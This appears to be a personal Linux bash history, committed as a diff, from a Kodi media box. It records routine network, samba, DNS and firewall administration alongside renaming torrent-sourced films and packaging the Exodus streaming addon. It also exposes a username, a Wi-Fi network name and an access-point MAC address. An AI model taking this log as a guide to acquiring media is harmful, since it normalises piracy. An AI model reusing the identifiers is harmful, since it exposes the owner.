+vim .bashrc +la +. .LESS_TERMCAP +man less +man tr +clear +ls +set +vim .bashrc +ll +rm kodi_crashlog-20171* +la +sudo chown bjohnston:bjohnston perfdata_mdm +la +ll +la +less .profile +clear +ls +la +less .vimrc +la +ls .vim +ls +la +ls colors/ +ls +la +chmod +x .vimrc +la +less .viminfo +la +less .xinputrc +la +ls +la +ls +less torrents/ +ls torrents/ +ls resume/ +la +s +la +less mpd.conf +clear +ls +ls +updatedb +sudo updatedb +locate *~ +for file in `locate *~`;do echo -e "$file +";done +for file in `locate *~`;do rm -f $file;done +for file in `locate *~`;do sudo rm -f $file;done +updatedb +sudo updatedb +locate *~ +clear +ls +la +file perfdata_mdm +less perfdata_mdm +ls +ll +less LESSOPEN +ls +ll +less README.Debian +ls +la +ls +ls +less LESSOPEN +la +ls +ls +ls kodi/ +ls adduser/ +ls kodi/addons/ +ls +ls nmap/ +ls nmap/scripts/ +ls +ls +ls +mandb +sudo mandb +la +la +ls etc/ +ls +ls +s +ls +s +ls +;s +ls +less server.conf +:q +sudo ifconfig eth0 down +clear +ls +la +ls +cla +clea +clear +dmesg +wiload.sh +sudo iptables -L +sudo iptables -F +sudo iptables -L +netstat -plant +top +sudo netstat -plant +top +cat /etc/resolv.conf +sudo sysctl -p +ls +ls +ll|grep -i alice +ls|grep -i alice +ls +ll +ls +ls | grep -i avenged +ls | grep -i scream +ls | grep -i gunsl +sudo su - +lo +ls Downloads/ +pwd +ls +ls +ls +ls +cp ~/Pictures/mbid-e54b7f4c-9099-4088-906f-0fd006d44fb5-13046183332_thumb250.jpg . +la +cp mbid-e54b7f4c-9099-4088-906f-0fd006d44fb5-13046183332_thumb250.jpg folder.jpg +ls +sudo sysctl -p +sudo su - +lo +sudo su - +tail -f kodi.log +log +sudo reboot +sudo /etc/init.d/bind9 restart +nslookup cnn.com +ifconfig +sudo ifconfig eth0 down +nslookup cnn.com +ifconfig +lo +wiload.sh +sudo ifdown eth0 +sudo ifconfig eth0 down +ifconfig +lo +lo +sudo su - +lo +sudo su - +env +cle +clear +dmesg +ls +la +sudo sysctl -p +lo +sudo iptables -L +sudo iptables -t nat-L +sudo iptables -t nat -L +sudo iptables -L +ls +ls +clear +ls +tail -f kodi.log +ls +ls -ltr +ls temp/ +ls weather/ +ls scrapers/ +ls +la +ls addons/ +ls +ls media/ +la media/ +ls +la sounds/ +la system/ +la userdata/ +ls +celar +clear +ls +less upnpserver.xml +ls +less sources.xml +la +less RssFeeds.xml +ls +less profiles.xml +ls +less guisettings.xml +ls +ll +ls Thumbnails/ +ls playlists/ +ls playlists/music/ +less playlists/music/playlist.m3u +ls +ls -al library/ +ls -al Database/ +sudo sysctl -p +lo +sudo sysctl -p +lo +sudo sysctl -p +lo +sudo ifconfig eth0 down +sudo apt-get update +sudo apt-get upgrade +pkill -1 kodi +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo iptables -L +sudo iptables -L -t nat +wiload.sh +ki +lo +wiload.sh +sud su - +sudo su k- +sudo su = +sudo su, - +sudo su +exit +sudo reboot +wiload.sh +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth9 +sudo ifup eth0 +lo +sudo su - +lo +sudo ifup eth0 +klo +lo +ls +vim .xinitrc +which gnome-terminal +fg +cat .xinitrc +vim .xinitrc +chmod +x .xinitrc +rm .xinitrc.swp +la +cat .blah +mv .bashrc.bak .bashrc +ls +ls -a +mv .blah .profile +ls |grep login +eit +reboot +exit +sudo apt-get install -y mint-meta-cinnamon +sudo pkill -9 -u bjohnston +wiload.sh +sudo sysctl -p +lo +sudo ifup eth0 +sudo /etc/init.d/bind9 restart +sudo sysctl -p +lo +sudo sysctl -p +lo +sudo su - +pkill -9 pidgin +sudo dhclient eth0 +sudo ifconfig wlan0 dowh +sudo ifconfig wlan0 down +oo +lo +wiload.sh +sudo ifconfig wlan0 down +sudo dhcliet eth0 +sudo dhclient eth0 +sudo ifconfig eth0 down +route +sudo su - +sudo tdbtool /var/lib/samba/wins.dat +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd +sudo systemctl restart nmbd +lo +sudo sysctl -p +lo +wiload.sh +sudo ifup eth0 +sudo /etc/init.d/bind9 restart +sudo sysctl -p +lo +sudo sysctl -p +lo +sudo systemctl smbd stop +sudo systemctl stop smbd +sudo systemctl stop nmbd +pkill -1 kodi +lo +sudo iptables-restore < /etc/iptables/rules.v4 +ifconfig +log +sudo rm /etc/ethers +wiload.sh +ls -ltr /etc/ +sudo rm /etc/ethers~ +cat /etc/networks +sudo ifdown eth0 +sudo ifconfig eth0 down +ls -ltr /etc/ +cat /etc/resolv.conf +unlink /etc/resolv.conf +sudo unlink /etc/resolv.conf +sudo vim /etc/resolv.conf +nslookup cnn.com +sudo /etc/init.d/bind9 restart +nslookup cnn.com +ping +wiload.sh +vim bin/wiload.sh +wiload.sh +cat /etc/resolv +cat /etc/resolv.conf +nslookup cnn.com +sudo vim /etc/resolv.conf +nslookup cnn.com +sudo /etc/init.d/bind9 restart +nslookup cnn.com +ifconfig +cat /etc/resolv.conf +nslookup cnn.com +sudo su - +ls +mv Constantine\ \(2005\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +ls +mv The\ Conjuring\ 2\ \(2016\)\ \[YTS.AG\]/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +ps aux|grep smbd +lo +ls +m The\ Conjuring\ \(2013\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +mv The\ Conjuring\ \(2013\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lo +pkill -1 rygel +ls +rm *.log +rm -f *.log +sudo updatedb& +lo +ls +mv *.torrent tmp/ +ls +rm google\(* +ls +rm dumpsysinfo* +ls +lo +wiload.sh +vim bin/wiload.sh +wiload.sh +sudo sysctl -p +sudo ifdown eth0 +sudo ifup eth0 +sudo sysctl -p +lo +nslookup ns.xfinity.com +sudo /etc/init.d/bind9 restart +nslookup ns.xfinity.com +nslookup ns.xfinitywifi.com +route -n +sudo apt-get update +sudo apt-get upgrade +sudo vim /etc/resolv.conf +sudo su - +ls +mv The\ Twilight\ Saga\ Breaking\ Dawn\ Part\ 2\ \(2012\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +sudo su- +sudo su - +lo +sudo apt-cache search tc +sudo apt-cache search tc|less +man -k tc +man tc +cat /etc/resolv.conf +sudo su - +lo +sudo su - +lo +ip link list +ip address show +ip route show +route +sudo vim /etc/networks +route +ip neigh show +ip rule list +ip route ls +ls +ll +ls -lh +rm Underworld.Blood.Wars.2016.720p.BluRay.x264-x0r\[TRAILER-Theatrical\ Trailer\]\[PRiME\].mov +ll +lh -lh +lo +ls +ls +ll +ls +ll +less Rogue\ One.nfo +strings Rogue\ One.nfo +lo +sudo systemctl start smbd +sudo systemctl start nmbd +wiload.sh +vim bin/wiload.sh +lo +ls -ltr +ls +mv Magic\ in\ the\ Moonlight\ \(2014\)\ \[1080p\]/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +sudo apt-cache search ushare +sudo apt-get remove --purge ushare +lo +vim .bashrc +. .bashrc +export|less +set |less +wc -l .bash_history +ls .ssh/ +less .ssh/id_rsa.pub +sudo su - +lo +h|grep git +grep git .bash_history +ls -al +ls -l +ls -a +ls -al|grep hist +wc -l .bash_history +less .bash_history +set|less +man bash +sudo su - +git config --global color.ui auto +git status +sudo su - +vim .bashrc +man less +vim .bashrc +. .bashrc +less .bashrc +vim .bashrc +. .bashrc +less .bashrc +. .bashrc +less .bashrc +. .bashrc +less .bashrc +export|less +less .bashrc +set|less +lo +man less +vim .bashrc +man less +lo +man less +sudo su - +git show +git push +git push -v --set-upstream origin +git push -v --set-upstream origin master +git pull +git pull +git push -v --set-upstream origin master +git status +git add .config/mpd/mpd.conf +git commit +git push +la +ls -ah +less .gitconfig +lo +less .bashrc +. .bashrc +less .bashrc +man vim +less .bashrc +. .bashrc +less .bashrc +. .bashrc +less .bashrc +. .bashrc +less .bashrc +. .bashrc +less .bashrc +. .bashrc +less .bashrc +git init +git remote add origin +ls -ah +rm .*~ +git add .bash* +git add .dircolors* +git add .face +git add .LESS_TERMCAP +git add .mpd.conf +ls .vim +git add .viminfo +git add .vim +git add .vimrc +git add .profile +ls .config/ +ls .config/Rygel/ +git add .config/rygel.conf +ls .config/conky/ +git add .config/conky/* +ls +la +lah +l ah +ls -ah +less .dmrc +ls +la -ah +ls -ah +less .gitconfig +git status +ls .kodi/ +ls .kodi/userdata/ +git add .kodi/userdata/*.xml +git status +git push -u origin master +git commit +git push -u origin master +man git-push +git commit +git push +man git-remote +ls Videos/Movies/ +mv Videos/Movies/Match\ Point\ \(2005\)\ \[YTS.AG\]/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lo +wc -l .bash_history +sudo sysctl -p +ls +vim advancedsettings.xml +vim guisettings.xml +vim advancedsettings.xml +vim favourites.xml +vim profiles.xml +vim advancedsettings.xml +sudo sysctl -p +lo +sudo sysctl -p +lo +vim advancedsettings.xml +git push +git commit +git commit .kodi/userdata/advancedsettings.xml +git push +git status +wc -l .bash_history +sudo sysctl -p +dig cnn.cm +dig cnn.com +pkill -1 conk +pkill -1 conky +pkill -9 conky +conky& +lo +wiload.sh +route +dig cnn.com +sudo /etc/init.d/bind9 restart +dig cnn.com +lo +dig cnn.com +ce +vim bin/wiload.sh +wiload.sh +sudo su - +dig cnn.com +sudo sysctl -p +dig cnn.com +cat /etc/resolv.conf +sudo vim /etc/resolv.conf +dig cnn.com +nslookup cnn.com +sudo sysctl -p +pkill -1 kodi +route +ifconfig +lo +wiload.sh +pkill -9 pidgin +lo +wiload.sh +ls +ls +./run-mozilla.sh +ll +ls +./firefox +sudo mv tmp/firefox /opt/ +sudo chown -R 0:0 /opt/firefox/ +ll /opt/ +sudo ifup eth0 +nslookup cnn.com +sudo iptables -L +sduo ifdown eth0 +sudo ifup eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +lo +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd +sudo systemctl restart nmbd +lo +nslookup cnn.com +sudo sysctl -p +mkdir Stranger\ Things +ls /home/bjohnston/Videos/Movies/ +ls /home/bjohnston/Videos/Movies/Stranger\ Things\ Season\ 2\ 720p\ \[tvbeasts.com\]/ +ls /home/bjohnston/Videos/Movies/Stranger\ Things\ Season\ 2\ 720p\ \[tvbeasts.com\]/ -l +df -k . +route +ls +mkdir TV +ls +ls +mv Stranger\ Things\ Season\ 2\ 720p\ \[tvbeasts.com\]/ "Stranger Things Season 2 720p" +ls +mv Stranger\ Things\ Season\ 2\ 720p/ ../TV/ +ls +ls +sudo updatedb & +locate *~ +for file in `locate *~`;do rm ${file};done +for file in `locate *~`;do sudo rm ${file};done +sudo updatedb & +locate *~ +cat /etc/resolv.conf +sudo apt-get update +sudo apt-get upgrade +lo +ls +cp conky.conf conky.conf.11-15-17 +vim conky.conf +touch conky.conf +pkill -1 conky +touch conky.conf +vim conky.conf +pkill -1 conky +vim conky.conf +pkill -1 conky +vim conky.conf +pkill -1 conky +vim conky.conf +pkill -1 conky +less conky +less conky.conf +sed 's/5b6dad/88a3cc/' conky.conf +sed -i 's/5b6dad/88a3cc/' conky.conf +pkill -1 conky +vim conky.conf +sed -i 's/5b6dad/88a3cc/g' conky.conf +pkill -1 conky +vim conky.conf +pkill -1 conky +vim conky.conf +less conky.conf +pkill -1 conky +less conky.conf +sed -i 's/aaccff/7f8ed3/g' conky.conf +pkill -1 conky +vim conky.conf +sed -i 's/7f8ed3/aaccff/g' conky.conf +pkill -1 conky +vim conky.conf +lo +ifconfig +zcat /usr/share/doc/ifupdown/examples/network-interfaces.gz |less +man conky +lo +man interfaces +sudo updatedb& +lo +sudo su - +nslookup cnn.com +lo +man iptables +lo +sudo sysctl -p +sudo su - +vim conky.conf +pkill -1 conky +vim conky.conf +pkill -1 conky +vim conky.conf +pkill -1 conky +vim conky.conf +sudo updatedb +locate *~ +rm *~ +locate .*~ +rm .conky.conf.un~ +sudo updatedb +git status +git commit +git push +git status +h|grep git +git add .config/rygel.conf +git push -u origin master +git status +git add .bash_history .config/conky/conky.conf .kodi/userdata/guisettings.xml .viminfo +git push +git commit +git push +git status +sudo su - +lo +sudo iptables -L +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L +lo +ls +ls +mv *.torrent Torrents/ +ll +l +ls +ll +ls +ls |grep -i wars +ls +mv Star\ Wars_\ Episode\ IV\ -\ A\ New\ Hope\ \(1977\)\ \[720p\]\ \[YTS.AG\].torrent tmp/Torrents/ +ls +ls explode/ +ls +ll +sudo netstat -plant +lo +ls +mv Star\ Wars\ Episode\ IV\ -\ A\ New\ Hope\ \(1977\)\ \[YTS.AG\]/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lo +ls +mv Star\ Wars\ Episode\ VII\ -\ The\ Force\ Awakens\ \(2015\)\ \[YTS.AG\]/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lo +sudo apt-get update +sudo apt-get upgrade +sudo apt-get autoremove +apt-get --help +sudo apt-get chec +sudo apt-get check +sudo apt-get autoclean +sudo updatedb& +locate *~ +for file in `locate *~`;do sudo rm -i ${file};done +sudo updatedb& +o +sudo su - +clear +ls +lo +sudo ifdown eth0 +sudo ifup eth0 +nslookup cnn.com +ls +ln -sn ../../Pictures/OGQ OGQ +vim confif +vim config +sudo su - +lo +lo +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd +sudo systemctl restart nmbd +smbstatus -alv +sudo smbstatus -alv +man smbstatus +sudo smbstatus -av +sudo lpq +testparm +sudo vim /etc/samba/smb.conf +testparm +sudo systemctl restart smbd +la +la +l. +less .xinitrc +rm .xinitrc +l. +gnome-keyring +man gnome-keyring +gnome-keyring-3 +man secret-tool +man seahorse +sudo apt-get update +sudo apt-get upgrade +sudo pkill -9 -u bjohnston +sudo ls -ltr /var/log/samba/ +sudo systemctl restart smbd +sudo systemctl restart nmbd +sudo ls -ltr /var/log/samba/ +sudo tail -f /var/log/samba/smbd.log +sudo ls -ltr /var/log/samba/ +sudo su - +log +sudo su - +sudo su - +sudo ifup eth0 +dig cnn.com +sudo systemctl restart smbd +sudo systemctl restart nmbd +lo +sudo vim /etc/samba/smb.conf +sudo systemctl restart smbd +sudo systemctl restart nmbd +lo +ls +mv Pirates\ of\ the\ Caribbean\ -\ Curse\ of\ the\ Black\ Pearl\ \(2003\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lo +ls +mv The\ Martian\ \(2015\)\ \[YTS.AG\]/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lo +sudo su - +ll resolv.conf +sudo unlink resolv.conf +sudo vim resolv.conf +lo +sudo su - +lo +ls +ls +lsw +ls +lo +tail -f .kodi/temp/kodi.log +sudo ifdown eth0 +sudo ifup eth0 +ifconfig +route +clear +lo +wiload.sh +sudo su - +lo +sudo systemctl enable smbd +sudo systemctl list-targets +sudo su - +lolo +lo +iwconfig +wiload.sh +iwconfig +less bin/wiload.sh +sudo iwconfig +sudo su - +wiload.sh +clear +nslookup cnn.com +cat /etc/resolv.conf +clear +lo +nslookup cnn.com +ls +sudo systemctl restart smbd +sudo systemctl restart nmbd +vim bin/wiload.sh +lo +sudo updatedb& +top +dmesg|less +sudo iptables -L +set +set|less +clear +ls +lo +dig cnn.com +nslookup xmission.com +clear +route +lo +sudo ifdown eth0 +sudo ifup eth0 +rpute +route +lo +wiload.sh +sudo ifdown eth0 +sudo ifup eth +sudo ifup eth0 +lo +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +lo +sudo systemctl restart smbd +sudo systemctl restart nmbd +lo +sudo su - +lo +sudo tdbtool /var/lib/samba/wins. +sudo tdbtool /var/lib/samba/wins.tdb +lo +sudo systemctl restart nmbd +lo +sudo su - +lo +sudo systemctl restart bind9.service +dig slashdot.org +lo +cat /etc/resolv.conf +sudo vim /etc/resolv.conf +lo +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +lo +sudo sysctl -p +lo +sudo su - +lo +ln -sn .kodi kodi +ll +ls +stty sane +ls +lo +ln +ln --help +ln -sn .kodi kodi +ll |grep ko +ls +unlink kodi +ls |grep kod +ln -sn .kodi kodi +ls +la +lo +zip --help +man zip +ls +ll +ls +ls +du -sk addons/ +ls |grep exodus +ls -l|less +ls |grep exodus +ls repository.exodus/ +for file in `ls |grep exodus`;do zip ~/exodus.zip - ${file};done +ls +ls ~ +ls |grep exodus +zip ~/exodus.zip - plugin.video.exodus repository.exodus script.exodus.* script.module.exodus +zip - plugin.video.exodus repository.exodus script.exodus.* script.module.exodus > ~/exodus.zip +ls -l ~/ +zip - plugin.video.exodus repository.exodus script.exodus.* script.module.exodus > ~/exodus.zip +ls +ll +ls +unzip ../exodus.zip +ls +ls +la +ls +ls +rm exodus.zip +ls +zip -r - plugin.video.exodus repository.exodus script.exodus.* script.module.exodus > ~/exodus.zip +ls +ls +ll +ls -lh +sudo su - +lo +log +which transmission-gtk +transmission-gtk & +ls +ls +ll|grep exo +ls +ll +less addon.xml +ll ..|grep resolv +ls ../script.module.urlresolver/ +less ../script.module.urlresolver/addon.xml +ls +ll ..|grep resolv +pwd +ls +less addon.xml +ls +ll|grep exod +ls +less addon.xml +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart nmbd +sudo systemctl restart smbd +less addon.xml +sudo su - +less addon.xml +sudo su - +pkill -1 conky +locate json +locate json|less +lo +sudo sysctl -p +lo +ps aux|less +pkill -9 pidgin +ps aux|less +sudo apt-get update +sudo apt-get upgrade +sudo updatedb& +wiload.sh +sudo ifdown eth0 +sudo ifup etho +sudo ifup eth0 +ifconfig +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd +sudo systemctl restart nmbd +clear +ls +sudo sysctl -p +lo +pkill -1 kodi +ls +lo +sudo su - +lo +sudo ifdown eth0 +lo +cat /etc/resolv.conf +nslookup cnn.com +sudo ifup eth0 +route +lo +ls +ls +pwd +ll +ll +mkdir "Harry Potter and the Half Blood Prince" +mv Harry_Potter_and_the_Half_Blood_Prince_2009.mkv Harry\ Potter\ and\ the\ Half\ Blood\ Prince/ +ll +ls +mv HP7.2010.BRRip.720p.Bluray.YIFY.mkv "Harry Potter and the Deathly Hallows.mkv" +ll +lo +wiload.sh +ifconfig +pkill -1 conky +lo +pkill -1 conky +pkill -9 conky +conky& +pkill -9 conky +lo +conky& +lo +nslookup xmission.co +nslookup xmission.com +clear +nslookup extratorrent.ag +clear +exit +sudo sysctl -p +lo +sudo su - +lo +nslookup cnn.com +cat /etc/resolv.conf +sudo ifdown eth0 +sudo ifup eth0 +clear +sudo sysctl -p +lo +pkill -9 kodi +clear +lo +cat /etc/resolv.conf +sudo su - +lo +sudo su - +lo +sudo sysctl -p +lo +cat /etc/resolv.conf +cat /etc/hosts +sudo vim /etc/hosts +ls +vim wiload.sh +wiload.sh +pkill -1 kodi +wiload.sh +vim wiload.sh +wiload.sh +sudo vim /etc/hosts +nslookup cnn.com +clear +lo +sudo iptables -t nat -F +sudo iptables -F +lo +sudo ifup eth0 +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +lo +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +sudo ifdown eth0 +sudo ifup eth0 +route +cat /etc/resolv.conf +sudo su - +vim /etc/resolv.conf +wiload.sh +log +wiload.sh +lo +sudo iptables -t nat -F +sudo iptables -F +sudo sysctl -p +lo +wiload.sh +ifconfig +lo +sudo ifup eth0 +ifconfig +sudo ifdown eth0 +sudo ifup eth0 +ifconfig +route +sudo vim /etc/networks +fg +route +lo +cinnamon --replace& +lo +sudo ifdown eth0 +route +cat /etc/resolv.conf +nslookup cnn.com +sudo ifup eth0 +rout +route +cat /etc/resolv.conf +sudo vim /etc/bind/named.conf.options +sudo systemctl restart bind9.service +nslookup cnn.com +nslookup cnn.com +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +lo +cinnamon-control-center +cinnamon-session --help +man cinnamon +cinnamon-session-quit --help +man cinnamon-session-quit +man cinnamon-session +ps aux|less +lo +pkill -1 kodi +pkill -9 chrome +sudo vim /etc/hosts +cat /etc/hosts +ifconfig +nslooup cnn.com +nslookup cnn.com +sudo iptables -L +route +clear +ip route flush +clear +dmesg +sudo ifup eth0 +lo +vim wiload.sh +wiload.sh +sudo ifup eth0 +lo +sudo sysctl -p +lo +sudo sysctl -p +lo +ls +vim ad +vim advancedsettings.xml +pkill -1 kodi +ls +ls -a +sudo sysctl -p +sudo iptables -t nat -F +sudo iptables -F +sudo sysctl -p +sudo ifdown eth0 +sudo sysctl -p +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo sysctl -p +sudo apt-get update +sudo iptables-restore < /etc/iptables/rules.v4 +sudo apt-get update +sudo vim /etc/hosts +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +ls +mkdir tldr +git init +git clones/tldr +ls +;s +ls +ls pa +ls pages/ +ls pages/linux/ +less README.md +l +ls +ls +less build +less build.sh +pwd +ls +pwd +s/tldr +vim ~/.bashrc +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +lo +sudo su - +man -k tldr +man tldr +less .bashrc +export TLDR_REPOSITORY=${HOME}/git-repos/tldr/tldr +tldr tldr +tldr --update +man tldr +tldr -o linux +tldr -o linux git +tldr -o linux curl +tldr -o linux tc +tldr -o linux iptables +sudo sysctl -p +lo +sudo sysctl -p +lo +dig cnn.com +cat /etc/hosts +route +netstat -r +netstat -rn +dmesg +clear +ip rout +ifconfig +df -k +sudo less /var/log/syslog +ps aux|grep kodi +sudo renice -1 5449 5453 +sudo sysctl -p +date +sudo sysctl -p +lo +sudo apt-cache search rtmpdump +sudo apt-get install rtmpdump +which rtmpdump +which vlc +which mplayer +sudo apt-get install mplayer +which mplayer +mysqladmin --help +mysql --help +mysql -u root -h localhost +mysql -u root -P -h localhost +mysql -u root -p -h localhost +mysql -u bjohnston -p -h localhost +mysql -u root -p -h localhost +mysql -u bjohnston -p -h localhost +s +ls +vim advancedsettings.xml +mysql -u bjohnston -p -h localhost +wiload.sh +pkill -1 kodi +fg +ls +ls -al +vim advancedsettings.xml +less .mysql_history +less .kodi/userdata/advancedsettings.xml +sudo su - +pkill -1 kodi +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +unlink Music +mkdir Music +vim t +ls +;s +ls +la +la +less settings.xml +ls +sudo sysctl -p +lo +less .mysql_history +man ssh +tldr ssh +sudo su - +mysql -u bjohnston -p -h localhost +sudo su - +sudo sysctl -p +lo +ls +ls -ltr +ls +ls ../Desktop/ +ls +ls ../Desktop/ +ls .. +ls -ltr .. +ls ../Google\ Drive/ +ls +ls +ls +ls +ls +ls -ltr +ls Documents/ +ls +ls backups/ +ls -ltr backups/ +cp backups/Windows.iso ~ +sudo sysctl -p +sudo su - +sudo sysctl -p +tail -f .kodi/temp/kodi.log +less .kodi/temp/kodi.log +vim .kodi/userdata/advancedsettings.xml +tail -f .kodi/temp/kodi.log +vim .kodi/userdata/advancedsettings.xml +tail -f .kodi/temp/kodi.log +log +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +lo +vim bin/wiload.sh +wiload.sh +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup wlan0 +wiload.sh +sudo ifdown eth0 +sudo ifconfig eth0 down +wiload.sh +ifup eth0 +sudo ifup eth0 +sudo sysctl -p +ls +ls +ls +ls +tail -f .kodi/temp/kodi.log +wiload.sh +lo +la +ls +mv Justice.League.Dark.2017.HDRip.XviD.AC3-EVO.avi Justice.League.Dark.2017.avi +mv Justice.League.Dark.2017.HDRip.XviD.AC3-EVO.nfo Justice.League.Dark.2017.nfo +sudo sysct -p +sudo sysctl -p +lolo +lo +wiload.sh +ls +ls |less +ls +mv Fantastic.Beasts.and.Where.to.Find.Them.2016.1080p.BRRip.x264.AAC-ETRG.mp4 "Fantastic Beasts and Where To Find Them.mp4" +ls +ls +ls |less +ls +mv Justice.League.Crisis.on.Two.Earths.2010.BRRip.720p.x265.2Ch.HAAC2-Sunil-KITE-METeam.mkv "Justice League - Crisis on Two Earths.mkv" +ls +ls +ls |less +ls +less Justice.League.Dark.2017.nfo +ls +less Justice.League.Dark.2017.nfo +ls +ls |less +ls +ls +ls +less playlist.xspf +rm playlist.xspf +clear +ls +ll +dmesg +ls |grep Fanta +mv Fantastic\ Beasts\ and\ Where\ to\ Find\ Them\ 2016/ "Fantastic Beasts and Where To Find Them" +ls|less +ls +ls +mv Justice.League.Dark.2017.avi "Justice League Dark.avi" +ls +vim Justice.League.Dark.2017.nfo +sudo sysctl -p +lo +sudo systemctl restart smbd +sudo systemctl restart nmbd +lo +wiload.sh +sudo sysctl -p +lo +ls +l. +ls -tr +ls Jackie\ Brown\ \(1997\)/ +ls +ls +ll +du -sk Full\ Metal\ Jacket\ 1987\ Deluxe\ Edition\ \(1080p\ x265\ 10bit\ Joy\)/ +du -sh Full\ Metal\ Jacket\ 1987\ Deluxe\ Edition\ \(1080p\ x265\ 10bit\ Joy\)/ +ls -lh Full\ Metal\ Jacket\ 1987\ Deluxe\ Edition\ \(1080p\ x265\ 10bit\ Joy\)/ +rm -rf Full\ Metal\ Jacket\ 1987\ Deluxe\ Edition\ \(1080p\ x265\ 10bit\ Joy\)/ +df -k . +df -dh . +df -h . +clear +ls +cp -ra /home/bjohnston/Videos/Movies/Jackie\ Brown\ \(1997\)/ . +ls -lltr Jack +ls -lltr Jackie\ Brown\ \(1997\)/ +rm -rf Jackie\ Brown\ \(1997\)/ +mv /home/bjohnston/Videos/Movies/Jackie\ Brown\ \(1997\)/ . +ks +ls +ls +ls -ltr +;s +ls +ls +ls +mv Jackie.Brown.1997.720p.BrRip.x264.YIFY.mkv "Jackie Brown.mkv" +ls +ls +mv Daybreakers.2009.720p.BrRip.x264.YIFY.mp4 "Daybreakers.mp4" +ls +mv Daybreakers\ \(2009\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +ls +ls +wiload.sh +ls +ls +mv Full.Metal.Jacket.1987.720p.BrRip.YIFY.mp4 "Full Metal Jacket (1987).mp4" +ls +ls +mv Full\ Metal\ Jacket\ \(1987\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lo +sudo sysctl -p +lo +wiload.sh +lo +tail -f .kodi/temp/kodi.log +clear +ls +wiload +wiload.sh +sudo apt-get update +audo apt-get install genisoimage wimtools cabextract +sudo apt-get install genisoimage wimtools cabextract +ls +mcd MASH\ \(1970\)/ +ls +ll +ls +ll MASH.1970.720p.BluRay.x264.\[YTS.AG\].mp4.part +ls +ls +mv * /media/bjohnston/Acer/Users/bjohnston/Videos/ +df -k . +wgetsoft.com/download/8/E/9/8E9BBC64-E6F8-457C-9B8D-F6C9A16E6D6A/KB3AIK_EN.iso +ls +ls -ltr +rm KB3AIK_EN.iso +wgetsoft.com/download/8/E/9/8E9BBC64-E6F8-457C-9B8D-F6C9A16E6D6A/KB3AIK_EN.iso +man dnsmasq +sudo vim /etc/dnsmasq.conf +sudo ifup eth0 +ps aux|grep dnsm +sudo su - +sudo mount Downloads/KB3AIK_EN.iso /mnt/waik/ +mkwinpeimg --iso --arch=amd64 --walk-dirs=/mnt/waik winpe.iso +mkwinpeimg --iso --arch=amd64 --walk-dir=/mnt/waik winpe.iso +mkwinpeimg --iso --arch=amd64 --waik-dir=/mnt/waik winpe.iso +sudo mv winpe.iso /var/lib/tftboot/ +umount /mnt/waik +sudo umount /mnt/waik +sudo vim /etc/samba/smb.conf +testparm +sudo vim /etc/samba/smb.conf +sudo su - +sudo ifdown eth9 +sudo ifdown eth0 +li +exut +exit +cinnamon --replace +sudo apt-get update +sudo apt-get upgrade +log +vim .bash_history +vim .bashrc +clear +ls +rm kodi* +ls +export +export|less +wc -l .bash_history +less .bash_history +man bash +sudo ifup eth0 +sudo tdbtool /var/lib/samba/wins.tdb +udo systemctl restart smbd +sudo systemctl restart smbd +sudo systemctl restart nmbd +lo +tail -f .kodi/temp/kodi.log +sudo ifdown eth0 +lo +sudo ifup eth0 +lo +sudo su - +lo +sudo ifdown eth0 +lo +sudo sku - +sudo su - +lo +wiload.sh +sudo apt-get update +sudo apt-get upgrade +lo +sudo sysctl -p +lo +mv Videos/Movies/Justice\ League/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lo +sudo ifup eth0 +sudo sysctl -p +sysctl -p +sudo sysctl -p +ifconfig +less wiload.sh +nohup gnome-terminal& +lo +less wiload.sh +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +iwconfig +ifconfig +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +ifconfig +sudo sysctl -p +pkill -1 kodi +log +sudo ifup eth0 +sudo ifdjown eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo sysctl -p +l +lo +ls +mv Batman.v.Superman.Dawn.of.Justice.2016.FANSUB.VOSTFR.HDRiP.XviD-TeamSuW.avi "Batman vs. Superman - Dawn of Justice" +ls +mv Batman\ vs.\ Superman\ -\ Dawn\ of\ Justice Batman\ vs.\ Superman\ -\ Dawn\ of\ Justice.avi +ll +lo +mv Batman\ vs.\ Superman\ -\ Dawn\ of\ Justice.avi "Batman v Superman: Dawn of Justice.avi" +ls +mv Batman\ vs.\ Superman\ 2016/ Batman\ vs.\ Superman +sudo updatedb* 